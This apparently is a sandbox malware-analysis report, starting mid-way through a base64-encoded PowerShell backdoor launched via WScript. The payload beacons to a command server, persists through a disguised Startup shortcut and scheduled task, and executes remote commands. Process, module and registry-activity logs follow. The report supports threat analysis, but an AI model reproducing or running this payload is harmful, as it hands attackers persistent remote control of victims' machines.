jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAoICJ2PSRhdnV4emh6Jmd1aWQ9JHd1d3p1eHYmZXJyb3I9c2VuZHBvc3QyOiIgKyAkbXl1cmxwb3N0KyI6IiskYXl6dnNjYmQgKyI6IisgJF8uRXhjZXB0aW9uLk1lc3NhZ2UgKSApICkgKTsKICB9OwogIHJldHVybiAkZmFsc2U7Cn07CgpmdW5jdGlvbiBoenlzYWhlc2IoICRhaml2Y3VkZ2ogKXsKICAkZ2ZjaGJ6dnQgPSAiaHR0cDovL2Nkbi51bml0eWNhcmVlcnMuY29tLyI7CiAgImhlZSIsInh1MSIsImhzMCIsImpkNSIsIm1xZiIgfCAleyAkZ2ZjaGJ6dnQgKz0gIiwiKyJodHRwOi8vIisgKCBbQ29udmVydF06OlRvQmFzZTY0U3RyaW5nKCBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAkXysgJChHZXQtRGF0ZSAtVUZvcm1hdCAiJXklbSVWIikgKSApLnRvTG93ZXIoKSApICsiLnRvcC8iOyB9OwogICRnZmNoYnp2dC5zcGxpdCgiLCIpIHwgJXsKICAgIGlmKCAhJG15dXJscG9zdCApewogICAgICAkbXl1cmxwb3N0ID0gJF87CiAgICAgIGlmKCAhKHNlbmRwb3N0MiAoJGFqaXZjdWRnaiArICImZG9tZW49JG15dXJscG9zdCIgKSkgKXsgJG15dXJscG9zdCA9ICRmYWxzZTsgfTsKICAgICAgU3RhcnQtU2xlZXAgLXMgNTsKICAgIH0KICB9OwogIGlmKCAkYWppdmN1ZGdqIC1tYXRjaCAic3RhdHVzPXJlZ2lzdGVyIiApewogICAgcmV0dXJuICJvayI7CiAgfWVsc2V7CiAgICByZXR1cm4gJG15dXJscG9zdDsKICB9IAp9OwoKaWYgKCBUZXN0LVBhdGggJGZidnlnYmp0ICl7CiAgaWYgKCAoICggTkVXLVRJTUVTUEFOIC1TdGFydCAoKEdldC1DaGlsZEl0ZW0gJGZidnlnYmp0ICkuQ3JlYXRpb25UaW1lKSAtRW5kIChHZXQtRGF0ZSkpLk1pbnV0ZXMgKSAtZ3QgMTUgKXsKICAgIHJpIC1QYXRoICRmYnZ5Z2JqdCAtRm9yY2U7CiAgICB0cnl7IGdldC1wcm9jZXNzIHBvd2Vyc2hlbGwqIHwgc3RvcC1wcm9jZXNzIH1jYXRjaHt9OwogICAgZXhpdDsKICB9ZWxzZXsgZXhpdDsgfTsKfTsKCmZ1bmN0aW9uIHliaWV1dmYoICRhaXZ1YXVqYiApewogIGlmKCAkYWl2dWF1amIgKXsKICAgIHNjIC1QYXRoICR0dmNoeXhqamlhIC1WYWx1ZSAoIFtndWlkXTo6TmV3R3VpZCgpLCAoIFtndWlkXTo6TmV3R3VpZCgpIC1yZXBsYWNlICctJywnJyApLlN1YnN0cmluZygwLDE2KSAgLWpvaW4gJywnICkgLUZvcmNlOyAgCiAgICBnaSAkdHZjaHl4amppYSAtRm9yY2UgfCAgJXsgJF8uQXR0cmlidXRlcyA9ICJIaWRkZW4iIH07CiAgICB0cnl7CiAgICAgICR3c2djaWh2ID0gW0Vudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgnU3RhcnR1cCcpICsgJ1xXaW5kb3dzQXBwbGljYXRpb25TZXJ2aWNlLmxuayc7CiAgICAgIGlmKCAtbm90ICggVGVzdC1QYXRoICR3c2djaWh2ICkgKXsKICAgICAgICAkd3hnYmd5Y3ogPSBOZXctT2JqZWN0IC1Db21PYmplY3QgKCdXU2NyaXB0LlNoZWxsJyk7CiAgICAgICAgJGpjandmYnhpID0gJHd4Z2JneWN6LkNyZWF0ZVNob3J0Y3V0KCAkd3NnY2lodiAgKTsKICAgICAgICAkamNqd2ZieGkuVGFyZ2V0UGF0aCA9ICR2ZmFldmh1eXY7CiAgICAgICAgJGpjandmYnhpLldvcmtpbmdEaXJlY3RvcnkgPSAkdGpmZ2RieWk7CiAgICAgICAgJGpjandmYnhpLldpbmRvd1N0eWxlID0gMTsKICAgICAgICAkamNqd2ZieGkuRGVzY3JpcHRpb24gPSAnV2luZG93cyBBcHBsaWNhdGlvbiBTZXJ2aWNlJzsKICAgICAgICAkamNqd2ZieGkuU2F2ZSgpOwogICAgICB9CiAgICB9Y2F0Y2h7fTsKICAgICR3dXd6dXh2LCAkdndkdmN0aWljID0gKGdldC1jb250ZW50ICR0dmNoeXhqamlhKS5zcGxpdCgnLCcpOwogICAgJGZjZGd1ZXYgPSAic3RhdHVzPXJlZ2lzdGVyJnNzaWQ9JHZ3ZHZjdGlpYyZvcz0iKyhbc3RyaW5nXSRQU1ZlcnNpb25UYWJsZS5CdWlsZFZlcnNpb24pKyImcHN2ZXI9IisoICggKEdldC1Ib3N0KS5WZXJzaW9uICkuTWFqb3IgKSsgIiZjb21wX25hbWU9IiArICgoR2V0LVdtaU9iamVjdCAtY2xhc3MgV2luMzJfQ29tcHV0ZXJTeXN0ZW0gLVByb3BlcnR5IE5hbWUpLk5hbWUudHJpbSgpICk7CiAgICBpZiggVGVzdC1QYXRoICggJHRqZmdkYnlpICsgIlx0aHVtYmNhY2hlXzMzLmRiIiApICl7CiAgICAgIHJpIC1QYXRoICggJHRqZmdkYnlpICsgIlx0aHVtYmNhY2hlXzMzLmRiIiApLCAoICR0amZnZGJ5aSArICJcV2luZG93c0luZGV4aW5nU2VydmljZS5qcyIgKSAtRm9yY2U7CiAgICAgIHRyeXsgc2NodGFza3MuZXhlIC9kZWxldGUgL1ROICJXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlIiAvZiB9Y2F0Y2h7fQogICAgICB0cnl7IHNjaHRhc2tzLmV4ZSAvZGVsZXRlIC9UTiAiV2luZG93cyBJbmRleGluZyBTZXJ2aWNlIiAvZiB9Y2F0Y2h7fQogICAgICBpZiggVGVzdC1QYXRoICggW0Vudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgnU3RhcnR1cCcpICsgJ1xXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlLmxuaycgKSAgKXsKICAgICAgICByaSAtUGF0aCAoIFtFbnZpcm9ubWVudF06OkdldEZvbGRlclBhdGgoJ1N0YXJ0dXAnKSArICdcV2luZG93c0luZGV4aW5nU2VydmljZS5sbmsnICkgLUZvcmNlOwogICAgICB9CiAgICB9CiAgICAkendkZ2V6eGIgPSBoenlzYWhlc2IgJGZjZGd1ZXY7CiAgICBpZiggJHp3ZGdlenhiIC1uZSAib2siKXsKICAgICAgcmkgLVBhdGggJHR2Y2h5eGpqaWEgLUZvcmNlOwogICAgICBleGl0OwogICAgfQogIH0KICByZXR1cm4gKGdldC1jb250ZW50ICR0dmNoeXhqamlhKS5zcGxpdCgnLCcpOwp9CiR2dXh0eGplZCA9IChzY2h0YXNrcy5leGUgL2NyZWF0ZSAvVE4gIldpbmRvd3NBcHBsaWNhdGlvblNlcnZpY2UiIC9zYyBEQUlMWSAvc3QgMDA6MDAgL2YgL1JJIDEzIC9kdSAyMzo1OSAvVFIgJHZmYWV2aHV5dik7IAppZiAoIFRlc3QtUGF0aCAkdHZjaHl4amppYSApewogICR3dXd6dXh2LCAkdndkdmN0aWljID0gIHliaWV1dmYgJGZhbHNlOwogIGlmKCAkdndkdmN0aWljLmxlbmd0aCAtbmUgMTYgICl7ICR3dXd6dXh2LCAkdndkdmN0aWljID0gIHliaWV1dmYgJHRydWU7IH0KfWVsc2V7CiAgJHd1d3p1eHYsICR2d2R2Y3RpaWMgPSAgeWJpZXV2ZiAkdHJ1ZTsKfQokbXl1cmxwb3N0ID0gaHp5c2FoZXNiOwp3aGlsZSggJHZjZWJ2dWJ6ZHggKXsKICBpYW13b3JrMjsKICB0cnl7CiAgICBpZiggJHZjZWJ2dWJ6ZHggLWFuZCAoJHZjZWJ2dWJ6ZHgubGVuZ3RoIC1ndCAzMCkgICl7CiAgICAgIGlleCAkdmNlYnZ1YnpkeDsKICAgIH07CiAgfWNhdGNoeyBneWl1eHpnZGJ3ICRfLkV4Y2VwdGlvbi5NZXNzYWdlOyB9OwogIFN0YXJ0LVNsZWVwIC1zIDI4MDsKICAkdmNlYnZ1YnpkeCA9IHNlbmRwb3N0MjsKfTsKcmkgLVBhdGggJGZidnlnYmp0IC1Gb3JjZTsK' ) );iex $a;
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorwks.dll
c:\windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system\9b0615d346556a8ae639dcec168731cc\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\fabca41dc6cc22a902c2525408b49ab9\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management.a#\d5ab9ebdfc2bacea66210c16fff703d2\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.core\2706ddbd765b8a111d3083f8af88ef03\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\326a4488a1881b3bd8ea1e8f4dd7420f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.configuratio#\1e9190c7a12053ea715c8d8ef8faddd1\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.wsman.man#\23314086651ff4d13264ef3cd19e0b4e\microsoft.wsman.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.transactions\9354030849f9e58d9b95d32149f7bb68\system.transactions.ni.dll
c:\windows\assembly\gac_64\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\2e6ebcf758bbffd55f7abfd8878c72c1\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\7c10a24ff552941b03414d424169041f\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\microsoft.powershel#\89738d6a75ab575f400360d0670f60ed\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework64\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.xml\e0542eb82c5f716397d316d5c88f7ae5\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.management\38c49b707af17308185a48479fcb7404\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.directoryser#\543de12ce97f16746b85981a80878035\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\microsoft.net\framework64\v2.0.50727\mscorjit.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_64\system.data\2276c85b65e1f517da1b9026640e2a55\system.data.ni.dll
c:\windows\assembly\gac_64\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\netutils.dll

Registry activity

Total events
3138
Read events
2781
Write events
355
Delete events
2

Modification events

PID
Process
Operation
Key
Name
Value
2584
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2584
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2584
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2584
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2460
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
LanguageList
en-US
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
2460
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
2460
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2460
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2460
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2460
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPDaysSinceLastAutoMigration
3
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPLastLaunchLowDateTime
3808804944
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPLastLaunchHighDateTime
30768811
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateLowDateTime
4109030569
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateHighDateTime
30768811
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000007D000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{2087FE65-EA9F-11E9-9008-5254004AAD21}
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
56446FE3AB7ED501
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
UpgradeTime
ECDC6FE3AB7ED501
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Window_Placement
2C0000000200000003000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF20000000200000004003000078020000
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery
Active
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
4
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E3070A00030009000E000E002700DF03
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
4
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSP
BackupDefaultSearchScope
00000000A6070000C35C7AA17A54A4B25109188C2DEB58DA766A761B54FB6F61EBA4DC8CA694DA876B00CE82820963653D0AA23B78B44316EFB24CA5C9C23EAF666E1FF3E7D8722D71552FABE4AB42AC0B4487FF3BA66F6FE8FB2E5A0F87F7471040862737016C2F95FAEAFFF15A0A000D57B3FA9C0D75D8EFE59D4FC6686417D2BBC1D8652F9C225A914CD5B7362B16C2E210EBD209FA7F2311D9BC4C874D3964805A7BD881845D4DB93517E75F1577E98737631ABB822A071D62E334030D36822D6F87CD19D237B8119374AEF539E8C4E5B78D784156E163AAE2098FFBF6161464BD487C16D0A0933B16A7A018B9A4FF9DA086D4BC9DEBFB58CF882C913443AEC3FE3C3098D1042DD64FC3D3E81065F24C873F674D2E1FDAC7CCE1EFE3DF3284EB03FF26BF5A80D881399BBA8583390C95CBF729126579A6979CEC5D1345EE347D6DCCA2AA5E653BDE6832AF0F052F08172241E92CBF0C6A698F0FDC3F3D5FDC176C8AA57B2D0F978BDE3DBCA660CC3872B498BBBB8C3E52DBC58C5B892171595B0E6C09513608D72A85B8E76AE0545C46218B1EE0F353368E47D9E90F5501EDE7AE1F404CCC7C6D5AB7868D7BC4E67533FF6C05B92549172297097BF3589F985C4E89CA8B55009CBADC24A2F9C1606CD9309EDC67A705DA37724DBD53821D3A5B6914D13072A2F5ECAF6C9704701A8AD76966880A7ED3B46D5576335133F4B282C291E35A5A522A8F4A6994BCC46CB0CFC95323C39F2B83649495F80B676C6673D6A605299694A242B1345142820B8D607338AAB03BD77CBDF1A633A31CA5A0CC82C910BD188793A7E7F00AB4E32ED12A00ACA4F236566816D346993785638E2EDBD2BA35C534555D90C13C33D686E2CDA02633AA8E9E0A10D08204E9DEB1093A6D19D1B3E93A98034CEA7FDF7B0A07E905A20CF6072BF24BBBAE93D7D04EB48EB2211B56C3BDE83B03E56BD8988A701E08D5C3F74953ED672353F5236AF15DCCBEDC163ED0AC7CA42A9D673ECE1F0C0C0BF7A0CD1FFAD704FC2528ECCE56FA92FA76AD8ACE56EADD65AE3231B45D2D5341173C99498C7BC35D14E6519C242E828EB4B75CBA4EF4888FB658D1645E7B935905AA79D8485842AA5E31747F980C3A52E3FAD328A1434434BB333E9C99866BE1C2A98E74E12D225BC3CE73E806B45BE9553D0F5857AEB080983998D18F867DB08E5DF9D863AA03E1B64B70F42F4B86DF737030014B146E138774FFEB3E8268B67911D88B78E685CBB0E589585B91598F58C655D04E401D88AC0F93686D84CCFF8DA44C25EFD7486B843EE0CA4B7D76FC01D8A0389DE45CECBD157494C1EA49A2828E758F9891ECEECEE8931AFE1E7B210B5F302DA116CD58B218C207ACED7FE505457438775C12E36A2BC4DC3BAB099F0150250F0A7E0FD2861F9DE91D100E59910F67B7362C58FA019F9177F76CC19E3E659FB42EB1C1820E122500103A96BAD1E26F8AFD385FEFA3131C9280E041F95686BD09C238859CD8A47A1CE15EB7CC9B59ADF186AEC71371E6838A84112BA61990A1DFD967FAED1EFABCC4780A11F274233FFB8DB0307E560CE816DC171DC91D766A383FD4BF36C9BD0B4142684438A7EE46368C873A83D587695B2F9AB889E3453894171176EC83F28747F490EFCCEA89E2F6C76A86A3E20D280B622A9DCB80A12AA0D626BEC7DBC750652AAFB409994434CAAA50B295CA204435D9FE6AA2DDFD628282FA366A76E4866DCC91326F77525A4A74045FE732DBDC668728C1CA8678FFDE495B805450B2495448D9096F08CC755433A02D7A1E77129ECDE84042092221EE666D3B411594B90A99FAD901762BA61B13C4BC660CF204673088882CE278E8585494060F79B7F617210F42E609710B12F8ACACAA1F47D44DD1323A5BFD8473985221830CB5B920A05043E4CF2CF5C5656C6C9E735DDAA0CCC4C2F465C2F9E45A3D9C507D03B357E61F285F1104FAF475DA4E3002F1418A783145583EB4085A2EABD80F6732BFBB3655585315965CB9D51C3E035C8FCAB00E3DF40439A15AF5F7673C5F9A49876CE9A17A605F7F1832625804B7D8D7233476D48399995D87D4B13496DFF13C8D8AD9857126CB3892805F2AC2EC8FD5BA34583336B86D17F0197BE1F231AEA89A35BD0BD0448EF095C33922F542608933D27B4BB5FFD52DEFE34FAA0BF4CBAC938DA34FBD5C09F0391CF091B159BD7E8C2C57F1141014A70D529BF2BFC70AC851B3D2D7CD0DB890B1A927A65AD24A7E5664E0DE8789622B9C863C47D04C07D056C52BBDD6F77BC3A68BF3D71B4B24428A984783900B7E92849E4EB14B22C1EF56E4BAA4F9BA3C2640E30DA200656B4317EA27A22D378302D7BC665CAEE819BB79302B861AF65CAE0BCF0A96E3C07E92B778C5C6BDAB24A31AFF338BEE40685402C9D246254B42D9C070C4B2CDFC70C4F46418816209FAD442873BDC5AC9D5984FCF7F1F19598577E3E61B1135B907EB66CD517AEDEF2603C273BEDCF4224F695D62AFD640C024015F52A2E3609832A1F9D2945075FFD104A3E58AEDEEED94F85CA2E5C979205D7DEAD225C118378E2352950B4D07D79F06C1FCFE7A16C9953072AF02C3C518D0F6FA8737413337097CC834A7DFA418B50C37D8D17AEE55162226A942A58B4AF685619267E8E03879BD53D14CF14A6363FF799947471E33AB8A29B0F2E0AE550CE230117565C3DAC349C08A3005CD565D49C65EC8BF4C0296622EE44ABED4D9428FD025B91DACBDE6325181E9287D93EC08C94907BEBF612F856265010000000E0000007A67784775642F5046646B2533640200000000000000
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences
88D7D0879DAB32E14DE5B3A805A34F98AFF34F5977
01000000D08C9DDF0115D1118C7A00C04FC297EB01000000A35B273C8C248C4AA9ED7E1D9A9C2341000000000200000000001066000000010000200000003772E03AED088BF73B3CAF63DFAFDF07E6230471EFF4609EB95B96395EDEE1B1000000000E800000000200002000000041E25B373758DE0ECFDAA079231C5EB2EC8BE8683BE824802F0A95877397CECA50000000195941DB09DD820B8970AB014FF7FCE5235414C76F79183C5CB7484001701878EA9A39A5D9AE4E79F6E205F4E2F9E7E9A671F6AB89314A848C5EC8194B47C355A77729458275DFBF5E6C58D047AFF58C40000000C4F3B87A4E1072DB651D0AB957AED0FFAD37704D8632416361733A1DC51A752C7EF9FE4A21853F1AF74C515C5FFD7A7BAE29981C37AB713FA2B14E19EB3A9EB3
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSP
ChangeNotice
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences
2D53CFFC5C1A3DD2E97B7979AC2A92BD59BC839E81
01000000D08C9DDF0115D1118C7A00C04FC297EB01000000A35B273C8C248C4AA9ED7E1D9A9C23410000000002000000000010660000000100002000000034CF947B4AF880CC1F9B94FAB99B8E02DD47FE20A41780522FFA99798179E002000000000E8000000002000020000000EBE4BDA0BB9243BD1D14B66CC88B92E9272F63090E91F1E02FC7B8640B2E256A1000000090E4F1244F9F25412B0A211884E8CA7C40000000F49D361983FBE7E4115B386A1A920B4E00A15261286DD1C9704CA2542A8A7066E4B4FC407EA8B381335C979BAB330295BDFFDF980BB18965DB22BF4E9F8C4763
1952
iexplore.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
LanguageList
en-US
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
5
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E3070A00030009000E000E002E00F600
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
5
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
DecayDateQueue
01000000D08C9DDF0115D1118C7A00C04FC297EB01000000A35B273C8C248C4AA9ED7E1D9A9C2341000000000200000000001066000000010000200000005ED3AD88AA9309B672B80C5336BB9B50E158246D798665974B699A48A4FBE193000000000E80000000020000200000004E931F5284ECDB1860F652CDFEADD12BB58C04126BB5022FA5C575906F07A17B300000008BE666C77A3B3E8F9EB977439FB89517FEF94EBDF78533542065095AB5F0434141EEB884AC94CA01B22C9E2982619F7D4000000011E98C208C8021CF54B072799FE93AA118C0CC8C587F9E21C15D6FB9E71B82D11AF28ECF82519797BD5C6392E5934DC75CB01C544A369F9AF67399416F79602E
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
LastProcessed
40F46DB9BC7ED501
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager
LastCheckForUpdateLowDateTime
4126530569
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager
LastCheckForUpdateHighDateTime
30768811
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListXMLVersionLow
395188360
1952
iexplore.exe
write
